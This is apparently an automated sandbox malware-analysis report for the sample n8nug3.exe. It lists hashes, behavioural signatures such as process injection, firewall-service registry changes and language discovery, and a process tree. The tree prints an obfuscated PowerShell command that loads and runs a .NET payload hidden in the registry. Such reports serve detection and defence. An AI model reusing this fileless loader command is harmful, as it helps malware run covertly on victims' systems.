Analysis
-
max time kernel
150s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20/09/2024, 08:57
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
n8nug3.exe
Resource
win7-20240903-en
10 signatures
150 seconds
Behavioral task
behavioral2
Sample
n8nug3.exe
Resource
win10v2004-20240802-en
19 signatures
150 seconds
General
-
Target
n8nug3.exe
-
Size
163KB
-
MD5
b20e29f2b88234cda8b95b43a4fec8aa
-
SHA1
13cca52a0dc3b9b352e14688f444ad9bcb9a9f4f
-
SHA256
e2481565a6c7a26690e99f63eea8e04615f7b3d92ca4ada11e331ce1053f962a
-
SHA512
019a4afbcd4c6236c226a05b0864df4f310fb91d41847dfcd84207d276a6219f66b725f5d3f637e7049d87fc81c88b8969a3061970be505bade70f767511313a
-
SSDEEP
3072:MQpsRTVjrJJCIFeesmomFEZkieYugOC7Arm2DilTw9/:MQpsRTVjrJBwesjmFEe5nhC7Arm2D0Ts
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2380 created 432 2380 powershell.EXE 5 -
pid Process 2380 powershell.EXE -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2380 set thread context of 2108 2380 powershell.EXE 33 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language n8nug3.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 70270f1d3b0bdb01 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2380 powershell.EXE 2380 powershell.EXE 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe 2108 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2380 powershell.EXE Token: SeDebugPrivilege 2380 powershell.EXE Token: SeDebugPrivilege 2108 dllhost.exe Token: SeAuditPrivilege 856 svchost.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 2188 wrote to memory of 2380 2188 taskeng.exe 31 PID 2188 wrote to memory of 2380 2188 taskeng.exe 31 PID 2188 wrote to memory of 2380 2188 taskeng.exe 31 PID 2380 wrote to memory of 2108 2380 powershell.EXE 33 PID 2380 wrote to memory of 2108 2380 powershell.EXE 33 PID 2380 wrote to memory of 2108 2380 powershell.EXE 33 PID 2380 wrote to memory of 2108 2380 powershell.EXE 33 PID 2380 wrote to memory of 2108 2380 powershell.EXE 33 PID 2380 wrote to memory of 2108 2380 powershell.EXE 33 PID 2380 wrote to memory of 2108 2380 powershell.EXE 33 PID 2380 wrote to memory of 2108 2380 powershell.EXE 33 PID 2380 wrote to memory of 2108 2380 powershell.EXE 33 PID 2108 wrote to memory of 432 2108 dllhost.exe 5 PID 2108 wrote to memory of 476 2108 dllhost.exe 6 PID 2108 wrote to memory of 492 2108 dllhost.exe 7 PID 2108 wrote to memory of 500 2108 dllhost.exe 8 PID 2108 wrote to memory of 604 2108 dllhost.exe 9 PID 2108 wrote to memory of 680 2108 dllhost.exe 10 PID 2108 wrote to memory of 752 2108 dllhost.exe 11 PID 2108 wrote to memory of 816 2108 dllhost.exe 12 PID 2108 wrote to memory of 856 2108 dllhost.exe 13 PID 2108 wrote to memory of 984 2108 dllhost.exe 15 PID 2108 wrote to memory of 280 2108 dllhost.exe 16 PID 2108 wrote to memory of 324 2108 dllhost.exe 17 PID 2108 wrote to memory of 1068 2108 dllhost.exe 18 PID 2108 wrote to memory of 1108 2108 dllhost.exe 19 PID 2108 wrote to memory of 1160 2108 dllhost.exe 20 PID 2108 wrote to memory of 1196 2108 dllhost.exe 21 PID 2108 wrote to memory of 2036 2108 dllhost.exe 23 PID 2108 wrote to memory of 864 2108 dllhost.exe 24 PID 2108 wrote to memory of 1572 2108 dllhost.exe 25 PID 2108 wrote to memory of 2348 2108 dllhost.exe 26 PID 2108 wrote to memory of 2244 2108 dllhost.exe 27 PID 2108 wrote to memory of 2188 2108 dllhost.exe 30
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:432
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{821cc14a-00d5-485b-9811-57ff9923148e}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2108
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:604
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:2036
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:1572
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:680
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:752
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:816
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1160
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
PID:856 -
C:\Windows\system32\taskeng.exetaskeng.exe {6878934F-F90E-4F16-95F0-A424159D67CE} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+'R'+'E').GetValue('s'+'v'+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2380
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:984
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:280
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:324
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1068
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1108
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:864
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2348
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2244
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:492
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:500
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1196
-
C:\Users\Admin\AppData\Local\Temp\n8nug3.exe"C:\Users\Admin\AppData\Local\Temp\n8nug3.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1788
-